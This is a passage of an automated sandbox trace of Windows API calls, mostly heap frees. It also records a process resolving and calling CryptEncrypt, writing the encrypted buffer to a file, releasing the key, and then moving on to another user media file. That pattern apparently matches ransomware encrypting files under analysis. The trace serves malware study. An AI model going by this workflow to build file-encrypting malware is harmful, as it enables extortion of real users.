dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0117.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f28 | out: hHeap=0x1780000) returned 1 [0117.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0117.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0117.977] CharLowerBuffW (in: lpsz="byte[29825]", cchLength=0xb | out: lpsz="byte[29825]") returned 0xb [0117.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0117.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0117.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0117.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0117.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0117.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0117.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe78 | out: hHeap=0x1780000) returned 1 [0117.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0117.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00d0 | out: hHeap=0x1780000) returned 1 [0117.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0117.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0117.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0117.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0117.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0117.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0117.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0117.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0117.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0117.978] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0117.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0117.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0117.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0117.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0117.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0117.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2728 | out: hHeap=0x1780000) returned 1 [0117.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0117.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0117.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0117.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4533238 | out: hHeap=0x1780000) returned 1 [0117.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0117.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0117.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0117.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x453a6c0 | out: hHeap=0x1780000) returned 1 [0117.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0117.978] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0117.978] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0117.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ce8 | out: hHeap=0x1780000) returned 1 [0117.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0117.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0117.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0117.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0117.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0117.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0117.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0117.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0117.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0117.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0117.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0117.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0117.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0117.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0117.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0117.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0117.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0117.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0117.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0117.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0117.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0117.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4533238 | out: hHeap=0x1780000) returned 1 [0117.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0117.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0117.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0170 | out: hHeap=0x1780000) returned 1 [0117.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0117.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0117.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0117.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0117.980] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0117.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0117.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0117.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0117.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0117.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0117.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0117.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0117.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0117.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0117.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0117.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0117.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0117.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0117.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0117.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0117.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0117.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0117.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0117.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0117.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0117.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0117.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0117.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0117.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0117.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0117.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0117.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0117.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0117.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0117.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0117.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0117.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0117.981] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0117.981] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cacd0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0117.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0117.981] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0117.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0117.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0117.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0117.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0117.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0117.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0117.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0117.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0117.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0117.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd60 | out: hHeap=0x1780000) returned 1 [0117.981] CryptEncrypt (in: hKey=0x41ac640, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x452bda8*, pdwDataLen=0x144e538*=0x747e, dwBufLen=0x7480 | out: pbData=0x452bda8*, pdwDataLen=0x144e538*=0x7480) returned 1 [0117.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0117.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0117.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0117.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0117.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0117.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0117.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0117.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0117.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0117.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0117.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0117.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0117.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0117.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0117.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0117.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0117.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0117.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0117.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0117.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0117.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0117.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0117.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0117.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0117.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0117.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0117.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0117.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0117.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0117.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0117.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0117.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0117.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0117.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0117.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0117.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0117.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0117.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0117.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0117.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0117.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0117.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0117.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0117.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0117.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0117.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0117.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0117.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0117.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0117.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0117.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0117.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0117.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0117.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0117.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0117.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0117.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f08 | out: hHeap=0x1780000) returned 1 [0117.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0117.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0117.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0117.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0117.984] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0117.984] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0117.984] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0117.984] WriteFile (in: hFile=0x258, lpBuffer=0x451d498*, nNumberOfBytesToWrite=0x7480, lpNumberOfBytesWritten=0x144ef3c, lpOverlapped=0x0 | out: lpBuffer=0x451d498*, lpNumberOfBytesWritten=0x144ef3c*=0x7480, lpOverlapped=0x0) returned 1 [0117.986] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0117.986] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0117.986] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0117.986] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0117.986] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca4f0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0117.986] CryptDestroyKey (hKey=0x41ac640) returned 1 [0117.986] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0117.986] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0117.986] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0117.989] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0117.989] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0117.989] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0117.989] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0117.989] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0117.989] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0117.989] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0117.990] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796fc8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0117.990] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0117.990] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0117.990] FreeLibrary (hLibModule=0x756e0000) returned 1 [0117.990] CloseHandle (hObject=0x298) returned 1 [0117.990] CloseHandle (hObject=0x258) returned 1 [0117.992] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\tG2O\\KxIfNFq_eT6K4Yywd.m4a", nBufferLength=0x7fff, lpBuffer=0x143ef38, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\tG2O\\KxIfNFq_eT6K4Yywd.m4a", lpFilePart=0x0) returned 0x30 [0117.992] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\tG2O\\KxIfNFq_eT6K4Yywd.m4a" (normalized: "c:\\users\\fd1hvy\\music\\tg2o\\kxifnfq_et6k4yywd.m4a")) returned 0x20 [0117.992] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca028 [0117.992] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2410 [0117.992] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f08 [0117.992] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2430 [0117.992] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f50 [0117.992] RtlAllocateHeap 